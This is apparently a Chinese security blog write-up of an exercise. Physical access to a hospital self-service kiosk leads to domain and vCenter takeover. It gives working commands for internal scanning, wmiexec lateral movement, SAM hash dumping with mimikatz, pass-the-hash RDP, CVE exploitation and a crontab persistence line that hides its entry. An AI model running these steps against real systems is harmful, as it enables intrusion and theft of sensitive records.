某次近源攻击到内网漫游

admin
admin
admin
102503
文章
87
评论
2023年12月1日08:40:57评论26 views字数 2299阅读7分39秒阅读模式

前言:

和同事利用周末时间对某单位做了一次攻防,主要就是采用近源攻击手法,最后也是通过该单位的一台自助机器进入内网,内网比较简单,涉及的方法前面文章也都有写过。

获取入口点:

前期通过踩点,发现了一个大厅的挂号机器:

某次近源攻击到内网漫游

这里点击空白处进行输入,可以调动windows键盘:

通过操作弹出文件管理器

某次近源攻击到内网漫游

由于该主机不出网,直接查看他的网络适配器:

某次近源攻击到内网漫游

我们到找到了一个可以插网线的接口,然后插上接口,按照地址地址去配,内网直接通了,在夜深人静的时候直接偷家了。

信息收集:

先进行网段的信息收集,利用gogo工具收集一下172,192,10段所有可达的C段:(这里我忘记截图了,就本地演示一下效果)

参考:https://chainreactors.github.io/wiki/gogo/do/#c

gogo.exe -w 172c   #对172所达C段进行扫描

扫描完后会在当前目录下生成一个.dat文件,直接解密该文件可获取C段

gogo.exe -F .dat
某次近源攻击到内网漫游

类似方法,收集完所有C段,fscan直接开始扫弱口令,由于是半夜,所以直接开干,当前网络环境较好,直接-np扫弱口令:

fscan.exe -p service -np -hf cd.txt

再开一个fscan扫描漏洞:

fscan.exe -pn service -hf cd.txt -nobr

最终扫描结果堪忧,就扫到了几台ssh弱口令,还不出网,一个漏洞都没扫到

某次近源攻击到内网漫游

文件上传获取突破口:

找到了一个fck编辑器界面,利用文件上传拿到了一个webshell:

某次近源攻击到内网漫游
某次近源攻击到内网漫游

该主机权限较低且有杀软,就没想着提权,在该主机上获取到了重要数据库地址,密码:

某次近源攻击到内网漫游

利用账号密码横到了机台数据库和主机:

某次近源攻击到内网漫游
某次近源攻击到内网漫游

接下来就是对这几台主机横过去,由于主机有杀软,利用impacket执行命令时无法回显,利用wmiexec-pro.py成功绕过命令执行:

python3 wmiexec-pro.py "./administrator:xxxxx"@1.1.1.1 exec-command -shell
某次近源攻击到内网漫游

开启3389直接登录:

python3 wmiexec-pro.py "./administrator:xxxxx"@1.1.1.1 rdp -enable  
某次近源攻击到内网漫游

利用上面的账号密码直接横过去

在一台机器上的radmin找到一个重要平台机器

某次近源攻击到内网漫游

获取到百万数据:

某次近源攻击到内网漫游

接下来把这个平台的密码给dump出来,读取注册表,本地获取到hash密码:

reg save hklmsam C:hashsam.hive
reg save hklmsystem C:hashsystem.hive
##mimikatz导出hash值
lsadump::sam /system:sys.hiv /sam:sam.hiv

利用该密码hash继续横向,也是这个密码拿下了域控:

PTH登陆域控:

利用wmiexec-pro.py开启rdp-pth-service:

python3 wmiexec-pro.py "./administrator"@1.1.1.1 -hashes :xxxxxxxxx rdp -enable-ram  
某次近源攻击到内网漫游

利用xfreerdp登陆:

xfreerdp /v:1.1.1.1 /u:administrator /pth:xxxxxxx /sound
某次近源攻击到内网漫游

发现报错,加条参数就解决了:

xfreerdp /v:1.1.1.1 /u:administrator /pth:xxxxxxxx /sound /tls-seclevel:0 /timeout:80000
某次近源攻击到内网漫游

成功登陆域控,获取域控dns记录,发现存在着大量his服务器和emr服务器:

某次近源攻击到内网漫游

继续渗透拿下vcenter:

发现一个vcenter界面。利用CVE-2021-21972文件上传获取到一个低权限webshell:

某次近源攻击到内网漫游

利用https://github.com/worawit/CVE-2021-3156/blob/main/exploit_userspec.py创建一个gg/gg用户,获取到root权限:

某次近源攻击到内网漫游

做了一个计划任务做个权限维持:

(crontab -l;printf "*/1 * * * * /bin/bash /tmp/1.sh;/bin/bash --noprofile -i;rno crontab for `whoami`%100cn")|crontab -

后面我选择的是创建一个管理员用户来接管vcenter:

https://github.com/3gstudent/Homework-of-Python/blob/master/vCenterLDAP_Manage.py

这里借助一下网上截图:

python vCenterLDAP_Manage.py adduser

例如增加一个[email protected]的用户,username就是用户名随便填,dn这里需要把第一个CN改成前面填写的用户名,然后DC字段与获取到的dcAccountDN一致,userPrincipalName这里就是真正的登录名,也需要与原本的保持一致,大概照着提示填写即可。

某次近源攻击到内网漫游

然后把用户加进管理员组

python vCenterLDAP_Manage.py addadmin

这里直接输入前面加用户的那个dn就行

某次近源攻击到内网漫游这里也是成功添加了一个管理员用户,成功登录并接管:
某次近源攻击到内网漫游

200多台机器,直接起飞,最后也是vcenter拿下门户网站和oa系统

总结:

这种攻击也是第一次尝试,还挺好玩的,内网渗透相对来说就比较简单,平时多积累一些工具和方法。打起来相对比较轻松一点。



原文始发于微信公众号(安全小子大杂烩):某次近源攻击到内网漫游

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月1日08:40:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某次近源攻击到内网漫游https://cn-sec.com/archives/2257936.html

发表评论

匿名网友 填写信息